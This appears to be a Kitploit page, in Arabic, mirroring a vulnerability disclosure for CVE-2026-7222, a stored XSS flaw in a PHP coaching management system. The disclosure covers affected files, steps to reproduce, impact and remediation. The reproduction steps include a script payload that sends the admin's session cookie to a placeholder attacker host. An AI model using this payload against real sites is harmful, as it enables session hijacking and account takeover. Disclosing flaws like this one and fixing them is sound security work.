Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-7222-XSS | Kitploit
أدوات/GitHubGitHub/xmyronn/cve-2026-7222-xss
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubxmyronn/cve-2026-7222-xss

CVE-2026-7222-XSS

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

البرمجة النصية عبر المواقع المخزنة (XSS) في نظام إدارة التدريب تؤدي إلى الاستيلاء على الحساب


المنتج

نظام إدارة التدريب في PHP (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/


المكونات المتأثرة

  • /modules/student/complaint.php (تقديم الشكوى)
  • /modules/admin/incomingcomplaint.php (عرض الشكوى)
  • وظيفة الرد على الشكوى (المشرف/المعلم ← الطالب)

الإصدار

غير معروف (لم تقدم الجهة المطوّرة أي معلومات عن الإصدار؛ تم الاختبار على أحدث إصدار متاح من Code-Projects.org اعتبارًا من أبريل 2026)


نوع الثغرة

CWE-79: التحييد غير الصحيح للمدخلات أثناء توليد صفحة الويب (البرمجة النصية عبر المواقع المخزنة)


الوصف

يفشل التطبيق في تعقيم مدخلات المستخدم بشكل صحيح في وظيفة الشكاوى والردود. يتم تخزين أكواد JavaScript الخبيثة التي يحقنها مستخدم ذو صلاحيات منخفضة وتنفيذها عندما يطّلع عليها مستخدمون ذوو صلاحيات أعلى مثل المشرفين أو المعلمين.

بالإضافة إلى ذلك، فإن وظيفة الرد عرضة للثغرة أيضًا، مما يسمح للمشرفين أو المعلمين بحقن أكواد JavaScript يتم تنفيذها في جلسات الطلاب.

يؤدي هذا إلى ثغرة XSS مخزنة تؤثر على أدوار مستخدمين متعددة.


خطوات إعادة الإنتاج

الحالة 1: الطالب ← المشرف (تصعيد الصلاحيات)

  1. سجّل الدخول كطالب

  2. انتقل إلى: /modules/student/complaint.php Screenshot 2026-04-10 212940

  3. قدّم شكوى تحتوي على الحمولة التالية:

root@kitploit:~
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
Screenshot 2026-04-10 213341
  1. سجّل الدخول كمشرف

  2. انتقل إلى: /modules/admin/incomingcomplaint.php Screenshot 2026-04-10 212951

  3. عندما يطّلع المشرف على الشكوى، تُنفَّذ الحمولة تلقائيًا

  4. يتم إرسال ملف تعريف ارتباط جلسة المشرف إلى الخادم الذي يتحكم فيه المهاجم

  5. استخدم ملف تعريف ارتباط الجلسة المسروق لاختطاف جلسة المشرف Screenshot 2026-04-10 213350

    Screenshot 2026-04-10 213406

الحالة 2: المشرف ← الطالب (XSS عكسي)

  1. سجّل الدخول كمشرف
  2. ردّ على شكوى باستخدام الحمولة:
root@kitploit:~
  1. سجّل الدخول كطالب
  2. اطّلع على رد الشكوى

أدلة إثبات المفهوم

  • تم تأكيد تنفيذ JavaScript في لوحة تحكم المشرف عند عرض الشكوى الخبيثة
  • تم تسريب ملف تعريف ارتباط الجلسة (PHPSESSID) بنجاح عبر خادم يتحكم فيه المهاجم
  • تم اختطاف جلسة المشرف باستخدام ملف تعريف الارتباط المسروق
  • تم تأكيد تنفيذ JavaScript في لوحة الطالب عبر وظيفة الرد

الأثر

  • يمكن للمستخدمين ذوي الصلاحيات المنخفضة (الطلاب) تنفيذ JavaScript عشوائي في سياق المشرف
  • يؤدي إلى اختطاف الجلسة بسبب عدم وجود خاصية HttpOnly
  • الاستيلاء الكامل على حساب المشرف
  • تسمح XSS ثنائية الاتجاه باختراق أدوار متعددة (المشرف، المعلم، الطالب)
  • اختراق كامل لسلامة التطبيق وسريته وتوافره

الخطورة: CRITICAL


السبب الجذري

  • عدم تعقيم المدخلات
  • غياب ترميز المخرجات
  • غياب الضوابط الأمنية على ملفات تعريف ارتباط الجلسة (عدم تعيين خاصية HttpOnly)

التوصية

  • قم بتعقيم جميع مدخلات المستخدم والتحقق من صحتها.
  • قم بترميز المخرجات باستخدام دوال مثل htmlspecialchars() في PHP
  • قم بتعيين خاصيتي HttpOnly وSecure على ملفات تعريف ارتباط الجلسة
  • قم بتطبيق سياسة أمان المحتوى (CSP)

تنزيل الأداة